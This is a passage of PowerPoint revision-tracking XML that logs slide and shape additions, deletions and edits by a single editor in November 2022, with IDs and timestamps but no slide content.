            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="14" creationId="{8233C88A-4F24-9A5D-A51B-884DADDD14FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:08:55.933" v="1118" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="15" creationId="{991330D5-BD01-F618-DE1C-20B504A6944E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-16T19:15:17.304" v="651" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2952784225" sldId="387"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-16T19:06:40.981" v="603"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952784225" sldId="387"/>
            <ac:spMk id="2" creationId="{75AF4C70-EA63-9D7D-89A0-871447A5A342}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-16T19:05:52.866" v="600" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2952784225" sldId="387"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modTransition">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-18T08:48:53.107" v="1157"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2059832249" sldId="388"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T10:47:21.431" v="821"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2059832249" sldId="388"/>
            <ac:spMk id="2" creationId="{DD1E62F6-B033-65A4-9627-2C21B5E88B6B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-16T18:58:21.879" v="527" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2059832249" sldId="388"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T10:43:12.553" v="718"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2059832249" sldId="388"/>
            <ac:spMk id="4" creationId="{1E555D8F-5422-3347-686D-8BA18060A9E3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T10:46:42.329" v="803" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2059832249" sldId="388"/>
            <ac:spMk id="5" creationId="{9AEFC8FF-DA94-B78E-D65E-D93515940249}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add del mod modGraphic">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T10:47:21.428" v="819" actId="21"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2059832249" sldId="388"/>
            <ac:graphicFrameMk id="6" creationId="{A665AC0D-9730-FA47-D348-8F519ADEAF10}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T15:44:50.313" v="1130"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2059832249" sldId="388"/>
            <ac:graphicFrameMk id="7" creationId="{032AF7DF-69CF-AF25-4E5B-765501602B14}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:53:01.548" v="4396" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4062684680" sldId="389"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:53:01.548" v="4396" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062684680" sldId="389"/>
            <ac:spMk id="2" creationId="{C4ABA326-AF91-29EA-05F9-76A030F9C910}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:51:59.088" v="1379" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062684680" sldId="389"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:50:28.725" v="1363" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2473232506" sldId="390"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:43:21.218" v="1246"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2473232506" sldId="390"/>
            <ac:spMk id="2" creationId="{09AB0C1D-A5FF-9A76-36E0-5E63480F74FD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:43:00.680" v="1243" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2473232506" sldId="390"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:45:28.675" v="1256" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2473232506" sldId="390"/>
            <ac:spMk id="4" creationId="{504936C6-BE29-BCEB-D90F-4895F8A0F3F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:46:04.644" v="1265" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2473232506" sldId="390"/>
            <ac:spMk id="5" creationId="{CB167C9B-96E3-E9F4-A083-586CE225A512}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:49:42.119" v="1361" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2473232506" sldId="390"/>
            <ac:spMk id="6" creationId="{DD7E14F2-1797-5F10-0733-26B8D7797A03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:50:24.144" v="1362" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2473232506" sldId="390"/>
            <ac:picMk id="7" creationId="{F333558D-F08D-8903-DC1E-950237D896BC}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:25.415" v="3448"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3788429974" sldId="391"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:59:00.542" v="2677"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3788429974" sldId="391"/>
            <ac:spMk id="2" creationId="{73137229-B562-F6C3-ED27-C2D1BC8419DD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:25.415" v="3448"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3788429974" sldId="391"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:55:45.661" v="2663"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2719368325" sldId="392"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:17:27.441" v="2008" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2719368325" sldId="392"/>
            <ac:spMk id="2" creationId="{D0656860-5073-5ADB-1EAC-6AC551AE3ACA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:33:55.073" v="2568"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2719368325" sldId="392"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:57:38.758" v="4424" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3110900800" sldId="393"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:34:02.053" v="2569"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2818300158" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:53:36.955" v="1392" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="2" creationId="{0975B7FB-03EA-788E-9578-1F0AAD06297A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:34:02.053" v="2569"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="3" creationId="{B7465817-3ECD-CF5A-2D8E-3B6EFBBBE529}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:53:42.690" v="1395" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="4" creationId="{F11036A7-A28C-CD2A-1F46-DB0E8DDF4D29}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:53:48.230" v="1398" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="5" creationId="{D07D3D2F-675C-3BD5-B89E-C4AB220E9944}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T17:55:14.010" v="1401" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="6" creationId="{0B0DB0B2-40A0-B7D9-6908-546351D24BDB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:06:20.318" v="1599"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="7" creationId="{A6B1F261-1EC8-B6BA-A80D-C1E50776873D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:06:00.507" v="1593"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="8" creationId="{EBEA2AE2-E957-0DBF-C47A-E31136FE4FDF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:06:20.311" v="1597" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="9" creationId="{00951408-369F-5201-8D4A-63408C477CD5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:22:21.053" v="2094" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2818300158" sldId="394"/>
            <ac:spMk id="10" creationId="{49A1E1CF-EE0D-7820-BB42-25E7083E9593}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:33:50.966" v="2567"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4079221904" sldId="395"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:35:51.292" v="2159" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079221904" sldId="395"/>
            <ac:spMk id="2" creationId="{D0656860-5073-5ADB-1EAC-6AC551AE3ACA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:33:50.966" v="2567"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079221904" sldId="395"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:37:58.219" v="2168" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079221904" sldId="395"/>
            <ac:spMk id="4" creationId="{CB9CC1FD-D01B-98F9-3516-0B27619ABFA6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:39:38.639" v="2199" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079221904" sldId="395"/>
            <ac:spMk id="5" creationId="{CA36902B-5662-FB74-987A-A496ED28D385}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:41:04.735" v="2208" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079221904" sldId="395"/>
            <ac:spMk id="6" creationId="{A664180F-C7A4-8DB7-B9BB-AB5B3B4DBFA1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:43:58.851" v="2297" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079221904" sldId="395"/>
            <ac:spMk id="7" creationId="{A94C1912-BFB5-2A58-E1AC-49CAF1763017}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:39:15.789" v="2575" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3423694575" sldId="396"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:46:07.938" v="2300" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="2" creationId="{6D2161E3-F4FA-DCA5-7CDA-43C6F8243825}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:33:42.070" v="2566" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="2" creationId="{894F6F77-717F-49DA-EB37-150FAA4A11BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:52:15.276" v="2403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="3" creationId="{3F62D435-4874-76F6-82E2-3C5F37A5AACC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:46:11.249" v="2302" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="4" creationId="{08512F7E-7037-AAAC-6FAA-749E464D34E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T11:39:15.789" v="2575" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="4" creationId="{8F07D4AF-EFC9-A83D-1FC2-09352F7C5E4F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:46:15.816" v="2304" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="5" creationId="{F96BEAC2-F54E-EB0B-A55F-61FF8B09AC8E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:48:59.658" v="2331" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="6" creationId="{12136262-DB6B-66D3-1331-3F0631AB8276}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:51:15.015" v="2392" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="7" creationId="{6C0991F5-C0D4-69AF-ADA2-3E0685935705}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-24T18:54:37.760" v="2430" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3423694575" sldId="396"/>
            <ac:spMk id="8" creationId="{B4671555-B592-2427-E201-5B3FA0168AAA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:08.751" v="3446"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="532894834" sldId="397"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-25T10:49:25.815" v="2519" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="532894834" sldId="397"/>
            <ac:spMk id="2" creationId="{501E2704-8680-5035-9C66-48AAC4B1FEAA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-27T17:39:35.498" v="2965"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="532894834" sldId="397"/>
            <ac:spMk id="2" creationId="{A2E6DE67-C298-1538-A089-A7AE4A6CC13D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T09:49:08.751" v="3446"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="532894834" sldId="397"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-27T17:42:49.515" v="3008" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="532894834" sldId="397"/>
            <ac:spMk id="4" creationId="{3255F2AB-631D-F26B-F120-67C818E8A577}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:56:42.296" v="4422" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="510617085" sldId="398"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:27:23.303" v="4113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="510617085" sldId="398"/>
            <ac:spMk id="2" creationId="{14F23651-710C-BCA9-85A5-7930DF5B9F7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:28:31.888" v="4135" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="510617085" sldId="398"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:56:42.296" v="4422" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="510617085" sldId="398"/>
            <ac:spMk id="4" creationId="{79EBC672-E5AC-25E1-0B3F-6F5FD5078395}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord">
